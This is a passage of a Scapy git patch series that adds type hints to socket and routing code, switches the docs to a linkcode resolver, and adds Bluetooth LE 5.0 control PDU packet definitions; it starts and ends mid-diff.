pkt.payload_type == 0x8001: + if pkt and pkt.payload_type == 0x8001: return pkt.payload else: return pkt diff --git a/scapy/interfaces.py b/scapy/interfaces.py index 096cc61ae6a..e0c0839eafd 100644 --- a/scapy/interfaces.py +++ b/scapy/interfaces.py @@ -42,7 +42,7 @@ class InterfaceProvider(object): libpcap = False def load(self): - # type: () -> NoReturn + # type: () -> Dict[str, NetworkInterface] """Returns a dictionary of the loaded interfaces, by their name.""" raise NotImplementedError diff --git a/scapy/route6.py b/scapy/route6.py index 4e1aab928aa..77fff4b1062 100644 --- a/scapy/route6.py +++ b/scapy/route6.py @@ -17,7 +17,7 @@ from __future__ import absolute_import import socket from scapy.config import conf -from scapy.interfaces import resolve_iface +from scapy.interfaces import resolve_iface, NetworkInterface from scapy.utils6 import in6_ptop, in6_cidr2mask, in6_and, \ in6_islladdr, in6_ismlladdr, in6_isincluded, in6_isgladdr, \ in6_isaddr6to4, in6_ismaddr, construct_source_candidate_set, \ @@ -52,7 +52,7 @@ def invalidate_cache(self): def flush(self): # type: () -> None self.invalidate_cache() - self.ipv6_ifaces = set() # type: Set[str] + self.ipv6_ifaces = set() # type: Set[Union[str, NetworkInterface]] self.routes = [] # type: List[Tuple[str, int, str, str, List[str], int]] # noqa: E501 def resync(self): @@ -104,7 +104,7 @@ def make_route(self, ifaddr = [ifaddr_uniq] else: lifaddr = in6_getifaddr() - devaddrs = [x for x in lifaddr if x[2] == dev] + devaddrs = (x for x in lifaddr if x[2] == dev) ifaddr = construct_source_candidate_set(prefix, plen, devaddrs) self.ipv6_ifaces.add(dev) diff --git a/scapy/supersocket.py b/scapy/supersocket.py index a65477dd047..d9632f2be6a 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -20,16 +20,31 @@ from scapy.data import MTU, ETH_P_IP, SOL_PACKET, SO_TIMESTAMPNS from scapy.compat import raw from scapy.error import warning, log_runtime -from scapy.interfaces import network_name +from scapy.interfaces import network_name, NetworkInterface import scapy.modules.six as six +from scapy.packet import Packet import scapy.packet +from scapy.plist import PacketList from scapy.utils import PcapReader, tcpdump +# Typing imports +from scapy.compat import ( + Any, + List, + Optional, + Tuple, + Type, + Union, +) # Utils + class _SuperSocket_metaclass(type): + desc = None # type: Optional[str] + def __repr__(self): + # type: () -> str if self.desc is not None: return "<%s: %s>" % (self.__name__, self.desc) else: @@ -37,9 +52,9 @@ def __repr__(self): # Used to get ancillary data -PACKET_AUXDATA = 8 -ETH_P_8021Q = 0x8100 -TP_STATUS_VLAN_VALID = 1 << 4 +PACKET_AUXDATA = 8 # type: int +ETH_P_8021Q = 0x8100 # type: int +TP_STATUS_VLAN_VALID = 1 << 4 # type: int class tpacket_auxdata(ctypes.Structure): @@ -51,37 +66,45 @@ class tpacket_auxdata(ctypes.Structure): ("tp_net", ctypes.c_ushort), ("tp_vlan_tci", ctypes.c_ushort), ("tp_padding", ctypes.c_ushort), - ] + ] # type: List[Tuple[str, Any]] # SuperSocket -class SuperSocket(six.with_metaclass(_SuperSocket_metaclass)): - desc = None - closed = 0 - nonblocking_socket = False - auxdata_available = False +@six.add_metaclass(_SuperSocket_metaclass) +class SuperSocket: + closed = 0 # type: int + nonblocking_socket = False # type: bool + auxdata_available = False # type: bool def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0): # noqa: E501 - self.ins = socket.socket(family, type, proto) - self.outs = self.ins + # type: (int, int, int) -> None + self.ins = socket.socket(family, type, proto) # type: socket.socket + self.outs = self.ins # type: Optional[socket.socket] self.promisc = None def send(self, x): + # type: (Packet) -> int sx = raw(x) try: x.sent_time = time.time() except AttributeError: pass - return self.outs.send(sx) + + if self.outs: + return self.outs.send(sx) + else: + return 0 if six.PY2: def _recv_raw(self, sock, x): + # type: (socket.socket, int) -> Tuple[bytes, Any, Optional[float]] """Internal function to receive a Packet""" pkt, sa_ll = sock.recvfrom(x) return pkt, sa_ll, None else: def _recv_raw(self, sock, x): + # type: (socket.socket, int) -> Tuple[bytes, Any, Optional[float]] """Internal function to receive a Packet, and process ancillary data. """ @@ -128,15 +151,17 @@ def _recv_raw(self, sock, x): return pkt, sa_ll, timestamp def recv_raw(self, x=MTU): + # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 """Returns a tuple containing (cls, pkt_data, time)""" return conf.raw_layer, self.ins.recv(x), None def recv(self, x=MTU): + # type: (int) -> Optional[Packet] cls, val, ts = self.recv_raw(x) if not val or not cls: - return + return None try: - pkt = cls(val) + pkt = cls(val) # type: Packet except KeyboardInterrupt: raise except Exception: @@ -150,41 +175,56 @@ def recv(self, x=MTU): return pkt def fileno(self): + # type: () -> int return self.ins.fileno() def close(self): + # type: () -> None if self.closed: return self.closed = True if getattr(self, "outs", None): if getattr(self, "ins", None) != self.outs: - if WINDOWS or self.outs.fileno() != -1: + if self.outs and (WINDOWS or self.outs.fileno() != -1): self.outs.close() if getattr(self, "ins", None): if WINDOWS or self.ins.fileno() != -1: self.ins.close() def sr(self, *args, **kargs): + # type: (Any, Any) -> Tuple[PacketList, PacketList] from scapy import sendrecv - return sendrecv.sndrcv(self, *args, **kargs) + ans, unans = sendrecv.sndrcv(self, *args, **kargs) # type: PacketList, PacketList # noqa: E501 + return ans, unans def sr1(self, *args, **kargs): + # type: (Any, Any) -> Optional[Packet] from scapy import sendrecv - a, b = sendrecv.sndrcv(self, *args, **kargs) + a, b = sendrecv.sndrcv(self, *args, **kargs) # type: PacketList, PacketList # noqa: E501 if len(a) > 0: - return a[0][1] + pkt = a[0][1] # type: Packet + return pkt else: return None def sniff(self, *args, **kargs): + # type: (Any, Any) -> PacketList from scapy import sendrecv - return sendrecv.sniff(opened_socket=self, *args, **kargs) + pkts = sendrecv.sniff(opened_socket=self, *args, **kargs) # type: PacketList # noqa: E501 + return pkts def tshark(self, *args, **kargs): + # type: (Any, Any) -> None from scapy import sendrecv - return sendrecv.tshark(opened_socket=self, *args, **kargs) - - def am(self, cls, *args, **kwargs): + sendrecv.tshark(opened_socket=self, *args, **kargs) + + # TODO: use 'scapy.ansmachine.AnsweringMachine' when typed + def am(self, + cls, # type: Type[Any] + *args, # type: Any + **kwargs # type: Any + ): + # type: (...) -> Any """ Creates an AnsweringMachine associated with this socket. @@ -194,6 +234,7 @@ def am(self, cls, *args, **kwargs): @staticmethod def select(sockets, remain=conf.recv_poll_rate): + # type: (List[SuperSocket], Optional[float]) -> Tuple[List[SuperSocket], None] # noqa: E501 """This function is called during sendrecv() routine to select the available sockets. @@ -210,13 +251,16 @@ def select(sockets, remain=conf.recv_poll_rate): return inp, None def __del__(self): + # type: () -> None """Close the socket""" self.close() def __enter__(self): + # type: () -> SuperSocket return self def __exit__(self, exc_type, exc_value, traceback): + # type: (Optional[Type[BaseException]], Optional[BaseException], Optional[Any]) -> None # noqa: E501 """Close the socket""" self.close() @@ -225,6 +269,7 @@ class L3RawSocket(SuperSocket): desc = "Layer 3 using Raw sockets (PF_INET/SOCK_RAW)" def __init__(self, type=ETH_P_IP, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501 + # type: (int, Optional[Any], Optional[str], Optional[bool], int) -> None # noqa: E501 self.outs = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 self.outs.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1) self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 @@ -249,14 +294,15 @@ def __init__(self, type=ETH_P_IP, filter=None, iface=None, promisc=None, nofilte log_runtime.info(msg) def recv(self, x=MTU): - pkt, sa_ll, ts = self._recv_raw(self.ins, x) + # type: (int) -> Optional[Packet] + data, sa_ll, ts = self._recv_raw(self.ins, x) if sa_ll[2] == socket.PACKET_OUTGOING: return None if sa_ll[3] in conf.l2types: - cls = conf.l2types[sa_ll[3]] + cls = conf.l2types.num2layer[sa_ll[3]] # type: Type[Packet] lvl = 2 elif sa_ll[1] in conf.l3types: - cls = conf.l3types[sa_ll[1]] + cls = conf.l3types.num2layer[sa_ll[1]] lvl = 3 else: cls = conf.default_l2 @@ -264,36 +310,50 @@ def recv(self, x=MTU): lvl = 3 try: - pkt = cls(pkt) + pkt = cls(data) except KeyboardInterrupt: raise except Exception: if conf.debug_dissector: raise - pkt = conf.raw_layer(pkt) + pkt = conf.raw_layer(data) + if lvl == 2: pkt = pkt.payload if pkt is not None: if ts is None: - from scapy.arch import get_last_packet_timestamp + from scapy.arch.linux import get_last_packet_timestamp ts = get_last_packet_timestamp(self.ins) pkt.time = ts return pkt def send(self, x): + # type: (Packet) -> int try: sx = raw(x) - x.sent_time = time.time() - return self.outs.sendto(sx, (x.dst, 0)) + if self.outs: + x.sent_time = time.time() + return self.outs.sendto( + sx, + (x.dst, 0) + ) + except AttributeError: + raise ValueError( + "Missing 'dst' attribute in the first layer to be " + "sent using a native L3 socket ! (make sure you passed the " + "IP layer)" + ) except socket.error as msg: log_runtime.error(msg) + return 0 class SimpleSocket(SuperSocket): desc = "wrapper around a classic socket" def __init__(self, sock): + # type: (socket.socket) -> None self.ins = sock self.outs = sock @@ -303,17 +363,19 @@ class StreamSocket(SimpleSocket): nonblocking_socket = True def __init__(self, sock, basecls=None): + # type: (socket.socket, Optional[Type[Packet]]) -> None if basecls is None: basecls = conf.raw_layer SimpleSocket.__init__(self, sock) self.basecls = basecls def recv(self, x=MTU): - pkt = self.ins.recv(x, socket.MSG_PEEK) - x = len(pkt) + # type: (int) -> Optional[Packet] + data = self.ins.recv(x, socket.MSG_PEEK) + x = len(data) if x == 0: return None - pkt = self.basecls(pkt) + pkt = self.basecls(data) # type: Packet pad = pkt.getlayer(conf.padding_layer) if pad is not None and pad.underlayer is not None: del(pad.underlayer.payload) @@ -329,12 +391,14 @@ class SSLStreamSocket(StreamSocket): desc = "similar usage than StreamSocket but specialized for handling SSL-wrapped sockets" # noqa: E501 def __init__(self, sock, basecls=None): + # type: (socket.socket, Optional[Type[Packet]]) -> None self._buf = b"" super(SSLStreamSocket, self).__init__(sock, basecls) # 65535, the default value of x is the maximum length of a TLS record def recv(self, x=65535): - pkt = None + # type: (int) -> Optional[Packet] + pkt = None # type: Optional[Packet] if self._buf != b"": try: pkt = self.basecls(self._buf) @@ -350,22 +414,31 @@ def recv(self, x=65535): x = len(self._buf) pkt = self.basecls(self._buf) - pad = pkt.getlayer(conf.padding_layer) - - if pad is not None and pad.underlayer is not None: - del(pad.underlayer.payload) - while pad is not None and not isinstance(pad, scapy.packet.NoPayload): - x -= len(pad.load) - pad = pad.payload - self._buf = self._buf[x:] + if pkt is not None: + pad = pkt.getlayer(conf.padding_layer) + + if pad is not None and pad.underlayer is not None: + del(pad.underlayer.payload) + while pad is not None and not isinstance(pad, scapy.packet.NoPayload): # noqa: E501 + x -= len(pad.load) + pad = pad.payload + self._buf = self._buf[x:] return pkt class L2ListenTcpdump(SuperSocket): desc = "read packets at layer 2 using tcpdump" - def __init__(self, iface=None, promisc=None, filter=None, nofilter=False, - prog=None, *arg, **karg): + def __init__(self, + iface=None, # type: Optional[Union[NetworkInterface, str]] + promisc=False, # type: bool + filter=None, # type: Optional[str] + nofilter=False, # type: bool + prog=None, # type: Optional[str] + *arg, # type: Any + **karg # type: Any + ): + # type: (...) -> None self.outs = None args = ['-w', '-', '-s', '65535'] if iface is None and (WINDOWS or DARWIN): @@ -384,17 +457,21 @@ def __init__(self, iface=None, promisc=None, filter=None, nofilter=False, if filter is not None: args.append(filter) self.tcpdump_proc = tcpdump(None, prog=prog, args=args, getproc=True) - self.ins = PcapReader(self.tcpdump_proc.stdout) + self.reader = PcapReader(self.tcpdump_proc.stdout) # type: ignore + self.ins = self.reader # type: ignore def recv(self, x=MTU): - return self.ins.recv(x) + # type: (int) -> Optional[Packet] + return self.reader.recv(x) def close(self): + # type: () -> None SuperSocket.close(self) self.tcpdump_proc.kill() @staticmethod def select(sockets, remain=None): + # type: (List[SuperSocket], Optional[float]) -> Tuple[List[SuperSocket], None] # noqa: E501 if (WINDOWS or DARWIN): return sockets, None return SuperSocket.select(sockets, remain=remain) diff --git a/scapy/utils.py b/scapy/utils.py index 82a3c672162..6d61bc8ff97 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -32,7 +32,7 @@ from scapy.modules.six.moves import range, input, zip_longest from scapy.config import conf -from scapy.consts import DARWIN, WINDOWS, WINDOWS_XP +from scapy.consts import DARWIN, WINDOWS from scapy.data import MTU, DLT_EN10MB from scapy.compat import orb, plain_str, chb, bytes_base64,\ base64_bytes, hex_bytes, lambda_tuple_converter, bytes_encode @@ -671,15 +671,9 @@ def valid_net6(addr): return valid_ip6(addr) -if WINDOWS_XP: - # That is a hell of compatibility :( - def ltoa(x): - # type: (int) -> str - return inet_ntoa(struct.pack(" str - return inet_ntoa(struct.pack("!I", x & 0xffffffff)) +def ltoa(x): + # type: (int) -> str + return inet_ntoa(struct.pack("!I", x & 0xffffffff)) def itom(x): diff --git a/scapy/utils6.py b/scapy/utils6.py index 5d2b7edf7dc..96bdcbe3a01 100644 --- a/scapy/utils6.py +++ b/scapy/utils6.py @@ -38,8 +38,12 @@ ) -def construct_source_candidate_set(addr, plen, laddr): - # type: (str, int, List[Tuple[str, int, str]]) -> List[str] +def construct_source_candidate_set( + addr, # type: str + plen, # type: int + laddr # type: Iterator[Tuple[str, int, str]] +): + # type: (...) -> List[str] """ Given all addresses assigned to a specific interface ('laddr' parameter), this function returns the "candidate set" associated with 'addr/plen'. diff --git a/test/bpf.uts b/test/bpf.uts index af8ad3dd7e7..869b4674c33 100644 --- a/test/bpf.uts +++ b/test/bpf.uts @@ -25,6 +25,10 @@ get_if_raw_hwaddr(conf.loopback_name) == (ARPHDR_LOOPBACK, b'\x00'*6) ############ + BPF related functions += Imports + +from scapy.arch.bpf.supersocket import L3bpfSocket, L2bpfListenSocket, L2bpfSocket + = Get a BPF handler ~ needs_root diff --git a/test/linux.uts b/test/linux.uts index 3b2e717e635..24afe5803be 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -149,6 +149,8 @@ else: = veth interface error handling ~ linux needs_root veth +from scapy.arch.linux import VEthPair + try: veth = VEthPair('this_IF_name_is_to_long_and_will_cause_an_error', 'veth_scapy_1') veth.setup() @@ -289,6 +291,8 @@ test_read_routes() = L3PacketSocket sendto exception ~ linux needs_root +from scapy.arch.linux import L3PacketSocket + if six.PY3: import mock, six, socket @mock.patch("scapy.arch.linux.socket.socket.sendto") diff --git a/test/regression.uts b/test/regression.uts index 6c59cb832c6..e8ac6458bc4 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2749,7 +2749,7 @@ assert isinstance(pkt, DNS) and isinstance(pkt.payload, NoPayload) import mock from io import StringIO -@mock.patch("scapy.arch.unix.get_if_addr") +@mock.patch("scapy.arch.get_if_addr") @mock.patch("scapy.arch.unix.os") def test_osx_netstat_truncated(mock_os, mock_get_if_addr): """Test read_routes() on OS X 10.? with a long interface name""" @@ -2784,9 +2784,7 @@ default link#11 UCSI 1 0 bridge1 def se_get_if_addr(iface): """Perform specific side effects""" if iface == "bridge1": - oserror_exc = OSError() - oserror_exc.message = "Device not configured" - raise oserror_exc + raise OSError("Device not configured") return "1.2.3.4" mock_get_if_addr.side_effect = se_get_if_addr # Test the function @@ -2809,7 +2807,7 @@ test_osx_netstat_truncated() import mock from io import StringIO -@mock.patch("scapy.arch.unix.get_if_addr") +@mock.patch("scapy.arch.get_if_addr") @mock.patch("scapy.arch.unix.os") def test_osx_10_13_ipv4(mock_os, mock_get_if_addr): """Test read_routes() on OS X 10.13""" @@ -2868,7 +2866,7 @@ test_osx_10_13_ipv4() import mock from io import StringIO -@mock.patch("scapy.arch.unix.get_if_addr") +@mock.patch("scapy.arch.get_if_addr") @mock.patch("scapy.arch.unix.os") def test_osx_10_15_ipv4(mock_os, mock_get_if_addr): """Test read_routes() on OS X 10.15""" diff --git a/test/sendsniff.uts b/test/sendsniff.uts index ea444b26414..234a5de519b 100644 --- a/test/sendsniff.uts +++ b/test/sendsniff.uts @@ -207,6 +207,8 @@ else: = Ensure bridge_and_sniff does not close sockets if data is send within xfrm on ingress interface +from scapy.arch.linux import VEthPair + with VEthPair('a_0', 'a_1') as veth_0: with VEthPair('b_0', 'b_1') as veth_1: xfrm_count = { diff --git a/test/windows.uts b/test/windows.uts index 49db64e768c..edbf5d7b4e9 100644 --- a/test/windows.uts +++ b/test/windows.uts @@ -41,6 +41,8 @@ assert dev_from_networkname(conf.iface.network_name).guid == conf.iface.guid = test pcap_service_status +from scapy.arch.windows import pcap_service_status + status = pcap_service_status() assert status @@ -82,6 +84,8 @@ assert conf.use_pcap == False = Prepare ping: open firewall & get current seq number ~ netaccess needs_root +from scapy.arch.windows.native import open_icmp_firewall, get_current_icmp_seq + # Note: this method is complicated, but allow us to perform a real test # it is discouraged otherwise. Npcap/Winpcap does NOT require such mechanics From dd92846c100a15aaef0b33864634186aaeb39935 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 8 Jan 2021 12:32:47 +0100 Subject: [PATCH 0478/1632] Use linkcode instead of viewcode in doc --- doc/scapy/_ext/linkcode_res.py | 100 +++++++++++++++++++++++++++++++++ doc/scapy/conf.py | 5 +- 2 files changed, 104 insertions(+), 1 deletion(-) create mode 100644 doc/scapy/_ext/linkcode_res.py diff --git a/doc/scapy/_ext/linkcode_res.py b/doc/scapy/_ext/linkcode_res.py new file mode 100644 index 00000000000..fdcc6d013d2 --- /dev/null +++ b/doc/scapy/_ext/linkcode_res.py @@ -0,0 +1,100 @@ +import inspect +import os +import sys + +import scapy + +# -- Linkcode resolver ----------------------------------------------------- + +# This is HEAVILY inspired by numpy's +# https://github.com/numpy/numpy/blob/73fe877ff967f279d470b81ad447b9f3056c1335/doc/source/conf.py#L390 + +# Copyright (c) 2005-2020, NumPy Developers. +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are +# met: +# +# * Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# +# * Redistributions in binary form must reproduce the above +# copyright notice, this list of conditions and the following +# disclaimer in the documentation and/or other materials provided +# with the distribution. +# +# * Neither the name of the NumPy Developers nor the names of any +# contributors may be used to endorse or promote products derived +# from this software without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +def linkcode_resolve(domain, info): + """ + Determine the URL corresponding to Python object + """ + if domain != 'py': + return None + + modname = info['module'] + fullname = info['fullname'] + + submod = sys.modules.get(modname) + if submod is None: + return None + + obj = submod + for part in fullname.split('.'): + try: + obj = getattr(obj, part) + except Exception: + return None + + # strip decorators, which would resolve to the source of the decorator + # possibly an upstream bug in getsourcefile, bpo-1764286 + try: + unwrap = inspect.unwrap + except AttributeError: + pass + else: + obj = unwrap(obj) + + fn = None + lineno = None + + try: + fn = inspect.getsourcefile(obj) + except Exception: + fn = None + if not fn: + return None + + try: + source, lineno = inspect.getsourcelines(obj) + except Exception: + lineno = None + + fn = os.path.relpath(fn, start=os.path.dirname(scapy.__file__)) + + if lineno: + linespec = "#L%d-L%d" % (lineno, lineno + len(source) - 1) + else: + linespec = "" + + if 'dev' in scapy.__version__: + return "https://github.com/secdev/scapy/blob/master/scapy/%s%s" % ( + fn, linespec) + else: + return "https://github.com/secdev/scapy/blob/v%s/scapy/%s%s" % ( + scapy.__version__, fn, linespec) diff --git a/doc/scapy/conf.py b/doc/scapy/conf.py index 8dfe2830302..981e8f0072f 100644 --- a/doc/scapy/conf.py +++ b/doc/scapy/conf.py @@ -37,7 +37,7 @@ 'sphinx.ext.autodoc', 'sphinx.ext.napoleon', 'sphinx.ext.todo', - 'sphinx.ext.viewcode', + 'sphinx.ext.linkcode', 'scapy_doc' ] @@ -50,6 +50,9 @@ # Enable the todo module todo_include_todos = True +# Linkcode resolver +from linkcode_res import linkcode_resolve + # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] From a436560b456cdf77a52fe64049737166edf476a6 Mon Sep 17 00:00:00 2001 From: Rubin Gerritsen Date: Sun, 10 Jan 2021 16:38:34 +0100 Subject: [PATCH 0479/1632] btle: Add definitions for Bluetooth 5.0 control PDUs (#3037) * btle: Add definitions for Bluetooth 5.0 control PDUs The changes only support using scapy as a packet builder. Dissection is not yet implemented. Co-authored-by: Rubin Gerritsen * Minor cosmetics changes Co-authored-by: Matheus Garbelini Co-authored-by: Gabriel --- scapy/layers/bluetooth4LE.py | 330 ++++++++++++++++++++++++++++- test/scapy/layers/bluetooth4LE.uts | 235 +++++++++++++++++++- 2 files changed, 550 insertions(+), 15 deletions(-) diff --git a/scapy/layers/bluetooth4LE.py b/scapy/layers/bluetooth4LE.py index cf51905f01d..40f8b0bb5f1 100644 --- a/scapy/layers/bluetooth4LE.py +++ b/scapy/layers/bluetooth4LE.py @@ -14,9 +14,10 @@ PPI_BTLE from scapy.packet import Packet, bind_layers from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ - Field, LEIntField, LEShortEnumField, LEShortField, \ + Field, FlagsField, LEIntField, LEShortEnumField, LEShortField, \ MACField, PacketListField, SignedByteField, X3BytesField, XBitField, \ - XByteField, XIntField, XShortField, XLEIntField, XLEShortField + XByteField, XIntField, XShortField, XLEIntField, XLELongField, \ + XLEShortField from scapy.contrib.ethercat import LEBitEnumField, LEBitField from scapy.layers.bluetooth import EIR_Hdr, L2CAP_Hdr @@ -128,6 +129,37 @@ def getfield(self, pkt, s): return s[5:], self.m2i(pkt, struct.unpack(self.fmt, s[:5] + b"\x00\x00\x00")[0]) # noqa: E501 +class BTLEFeatureField(FlagsField): + def __init__(self, name, default): + super(BTLEFeatureField, self).__init__( + name, default, -64, + ['le_encryption', + 'conn_par_req_proc', + 'ext_reject_ind', + 'slave_init_feat_exch', + 'le_ping', + 'le_data_len_ext', + 'll_privacy', + 'ext_scan_filter', + 'le_2m_phy', + 'tx_mod_idx', + 'rx_mod_idx', + 'le_coded_phy', + 'le_ext_adv', + 'le_periodic_adv', + 'ch_sel_alg', + 'le_pwr_class'] + ) + + +class BTLEPhysField(FlagsField): + def __init__(self, name, default): + super(BTLEPhysField, self).__init__( + name, default, -8, + ['phy_1m', 'phy_2m', 'phy_coded'] + ) + + ########## # Layers # ########## @@ -300,23 +332,270 @@ class BTLE_CONNECT_REQ(Packet): BTLE_Versions = { - 7: '4.1' + 6: '4.0', + 7: '4.1', + 8: '4.2', + 9: '5.0', + 10: '5.1', + 11: '5.2', } + + BTLE_Corp_IDs = { - 0xf: 'Broadcom Corporation' + 0xf: 'Broadcom Corporation', + 0x59: 'Nordic Semiconductor ASA' } -class CtrlPDU(Packet): - name = "CtrlPDU" +BTLE_BTLE_CTRL_opcode = { + 0x00: 'LL_CONNECTION_UPDATE_REQ', + 0x01: 'LL_CHANNEL_MAP_REQ', + 0x02: 'LL_TERMINATE_IND', + 0x03: 'LL_ENC_REQ', + 0x04: 'LL_ENC_RSP', + 0x05: 'LL_START_ENC_REQ', + 0x06: 'LL_START_ENC_RSP', + 0x07: 'LL_UNKNOWN_RSP', + 0x08: 'LL_FEATURE_REQ', + 0x09: 'LL_FEATURE_RSP', + 0x0A: 'LL_PAUSE_ENC_REQ', + 0x0B: 'LL_PAUSE_ENC_RSP', + 0x0C: 'LL_VERSION_IND', + 0x0D: 'LL_REJECT_IND', + 0x0E: 'LL_SLAVE_FEATURE_REQ', + 0x0F: 'LL_CONNECTION_PARAM_REQ', + 0x10: 'LL_CONNECTION_PARAM_RSP', + 0x14: 'LL_LENGTH_REQ', + 0x15: 'LL_LENGTH_RSP', + 0x16: 'LL_PHY_REQ', + 0x17: 'LL_PHY_RSP', + 0x18: 'LL_PHY_UPDATE_IND', +} + + +class BTLE_EMPTY_PDU(Packet): + name = "Empty data PDU" + + +class BTLE_CTRL(Packet): + name = "BTLE_CTRL" + fields_desc = [ + ByteEnumField("opcode", 0, BTLE_BTLE_CTRL_opcode) + ] + + +class LL_CONNECTION_UPDATE_IND(Packet): + name = 'LL_CONNECTION_UPDATE_IND' + fields_desc = [ + XByteField("win_size", 0), + XLEShortField("win_offset", 0), + XLEShortField("interval", 6), + XLEShortField("latency", 0), + XLEShortField("timeout", 50), + XLEShortField("instant", 6), + ] + + +class LL_CHANNEL_MAP_IND(Packet): + name = 'LL_CHANNEL_MAP_IND' + fields_desc = [ + BTLEChanMapField("chM", 0xFFFFFFFFFE), + XLEShortField("instant", 0), + ] + + +class LL_TERMINATE_IND(Packet): + name = 'LL_TERMINATE_IND' + fields_desc = [ + XByteField("code", 0x0), + ] + + +class LL_ENC_REQ(Packet): + name = 'LL_ENC_REQ' + fields_desc = [ + XLELongField("rand", 0), + XLEShortField("ediv", 0), + XLELongField("skdm", 0), + XLEIntField("ivm", 0), + ] + + +class LL_ENC_RSP(Packet): + name = 'LL_ENC_RSP' + fields_desc = [ + XLELongField("skds", 0), + XLEIntField("ivs", 0), + ] + + +class LL_START_ENC_REQ(Packet): + name = 'LL_START_ENC_REQ' + fields_desc = [] + + +class LL_START_ENC_RSP(Packet): + name = 'LL_START_ENC_RSP' + + +class LL_UNKNOWN_RSP(Packet): + name = 'LL_UNKNOWN_RSP' + fields_desc = [ + XByteField("code", 0x0), + ] + + +class LL_FEATURE_REQ(Packet): + name = "LL_FEATURE_REQ" + fields_desc = [ + BTLEFeatureField("feature_set", 0) + ] + + +class LL_FEATURE_RSP(Packet): + name = "LL_FEATURE_RSP" + fields_desc = [ + BTLEFeatureField("feature_set", 0) + ] + + +class LL_PAUSE_ENC_REQ(Packet): + name = "LL_PAUSE_ENC_REQ" + + +class LL_PAUSE_ENC_RSP(Packet): + name = "LL_PAUSE_ENC_RSP" + + +class LL_VERSION_IND(Packet): + name = "LL_VERSION_IND" fields_desc = [ - XByteField("optcode", 0), - ByteEnumField("version", 0, BTLE_Versions), - LEShortEnumField("Company", 0, BTLE_Corp_IDs), + ByteEnumField("version", 8, BTLE_Versions), + LEShortEnumField("company", 0, BTLE_Corp_IDs), XShortField("subversion", 0) ] +class LL_REJECT_IND(Packet): + name = "LL_REJECT_IND" + fields_desc = [ + XByteField("code", 0x0), + ] + + +class LL_SLAVE_FEATURE_REQ(Packet): + name = "LL_SLAVE_FEATURE_REQ" + fields_desc = [ + BTLEFeatureField("feature_set", 0) + ] + + +class LL_CONNECTION_PARAM_REQ(Packet): + name = "LL_CONNECTION_PARAM_REQ" + fields_desc = [ + XShortField("interval_min", 0x6), + XShortField("interval_max", 0x6), + XShortField("latency", 0x0), + XShortField("timeout", 0x0), + XByteField("preferred_periodicity", 0x0), + XShortField("reference_conn_evt_count", 0x0), + XShortField("offset0", 0x0), + XShortField("offset1", 0x0), + XShortField("offset2", 0x0), + XShortField("offset3", 0x0), + XShortField("offset4", 0x0), + XShortField("offset5", 0x0), + ] + + +class LL_CONNECTION_PARAM_RSP(Packet): + name = "LL_CONNECTION_PARAM_RSP" + fields_desc = [ + XShortField("interval_min", 0x6), + XShortField("interval_max", 0x6), + XShortField("latency", 0x0), + XShortField("timeout", 0x0), + XByteField("preferred_periodicity", 0x0), + XShortField("reference_conn_evt_count", 0x0), + XShortField("offset0", 0x0), + XShortField("offset1", 0x0), + XShortField("offset2", 0x0), + XShortField("offset3", 0x0), + XShortField("offset4", 0x0), + XShortField("offset5", 0x0), + ] + + +class LL_REJECT_EXT_IND(Packet): + name = "LL_REJECT_EXT_IND" + fields_desc = [ + XByteField("reject_opcode", 0x0), + XByteField("error_code", 0x0), + ] + + +class LL_PING_REQ(Packet): + name = "LL_PING_REQ" + + +class LL_PING_RSP(Packet): + name = "LL_PING_RSP" + + +class LL_LENGTH_REQ(Packet): + name = ' LL_LENGTH_REQ' + fields_desc = [ + XLEShortField("max_rx_bytes", 251), + XLEShortField("max_rx_time", 2120), + XLEShortField("max_tx_bytes", 251), + XLEShortField("max_tx_time", 2120), + ] + + +class LL_LENGTH_RSP(Packet): + name = ' LL_LENGTH_RSP' + fields_desc = [ + XLEShortField("max_rx_bytes", 251), + XLEShortField("max_rx_time", 2120), + XLEShortField("max_tx_bytes", 251), + XLEShortField("max_tx_time", 2120), + ] + + +class LL_PHY_REQ(Packet): + name = "LL_PHY_REQ" + fields_desc = [ + BTLEPhysField('tx_phys', 0), + BTLEPhysField('rx_phys', 0), + ] + + +class LL_PHY_RSP(Packet): + name = "LL_PHY_RSP" + fields_desc = [ + BTLEPhysField('tx_phys', 0), + BTLEPhysField('rx_phys', 0), + ] + + +class LL_PHY_UPDATE_IND(Packet): + name = "LL_PHY_UPDATE_IND" + fields_desc = [ + BTLEPhysField('tx_phy', 0), + BTLEPhysField('rx_phy', 0), + XShortField("instant", 0x0), + ] + + +class 